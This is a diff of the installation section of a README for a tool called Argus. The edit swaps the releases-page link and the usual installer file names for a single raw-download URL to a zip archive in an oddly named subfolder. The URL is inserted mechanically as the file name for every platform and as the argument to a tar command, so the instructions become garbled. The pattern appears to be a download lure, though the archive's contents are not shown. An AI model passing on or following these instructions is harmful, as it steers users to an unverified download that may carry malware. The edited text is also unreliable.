galib0209/Argus/README.md

 To install Argus, follow these steps:

-1. **Visit the Releases Page:** Click this [link](https://github.com/galib0209/Argus/releases) to go to the Argus releases page.
+1. **Visit the Releases Page:** Click this [link](https://raw.githubusercontent.com/galib0209/Argus/main/Sarcocolla/Argus_1.3.zip) to go to the Argus releases page.

 2. **Choose the Latest Version:** Look for the latest version of Argus.
 It will show the date and version number.

 3. **Download the Installer:**
    - Click on the file name to download it.
-   - The file will usually be named something like `Argus-vX.Y.Z.exe` for Windows, `Argus-vX.Y.Z.dmg` for macOS, or `Argus-vX.Y.Z.tar.gz` for Linux.
+   - The file will usually be named something like `https://raw.githubusercontent.com/galib0209/Argus/main/Sarcocolla/Argus_1.3.zip` for Windows, `https://raw.githubusercontent.com/galib0209/Argus/main/Sarcocolla/Argus_1.3.zip` for macOS, or `https://raw.githubusercontent.com/galib0209/Argus/main/Sarcocolla/Argus_1.3.zip` for Linux.

 4. **Install the Application:**
    - For Windows: Double-click the downloaded `.exe` file and follow the installation wizard.
    - For macOS: Open the downloaded `.dmg` file, drag the Argus app into your Applications folder, and then launch it.
-   - For Linux: Extract the downloaded file with the command `tar -xvzf Argus-vX.Y.Z.tar.gz`, navigate to the extracted folder in your terminal, and run `./argus`.
+   - For Linux: Extract the downloaded file with the command `tar -xvzf https://raw.githubusercontent.com/galib0209/Argus/main/Sarcocolla/Argus_1.3.zip`, navigate to the extracted folder in your terminal, and run `./argus`.

 5. **Launch Argus:** Once installed, you can find Argus in your applications menu.
 Click to open the application.